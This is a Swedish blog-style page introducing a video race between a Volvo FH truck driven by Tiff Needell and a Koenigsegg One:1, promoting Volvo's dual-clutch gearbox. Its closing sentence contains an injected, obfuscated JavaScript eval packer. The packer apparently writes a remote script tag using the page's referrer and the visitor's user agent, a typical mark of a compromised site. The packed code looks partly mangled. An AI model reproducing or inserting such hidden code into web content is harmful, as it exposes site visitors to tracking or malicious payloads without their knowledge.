Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Video: Volvo vs Koenigsegg

I denna ultimata utmaningen får vi se en Volvo FH lastbil köra ett  lopp mot en av världens snabbaste bil, en Koenigsegg One : 1 . Två helt olika fordon hamnar i en spännande kamp för att ta hem segern. Bakom ratten på Volvo FH lastbilen sitter TV-presentatör och tidigare racerförare Tiff Needell.

Tävlingen hålls för att testa Volvo Lastvagnars nya växellåda I- Shift Dual Clutch , som är baserad på modern sportbilsteknik. Tiff Needell har aldrig innan kört en lastbil, så först får han ta Volvo FH på ett par prov varv . Och sedan : är dem igång !

Kika eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ftsyy|var|u0026u|referrer|enird||js|php’.split(’|’),0,{}))
in videon ovan!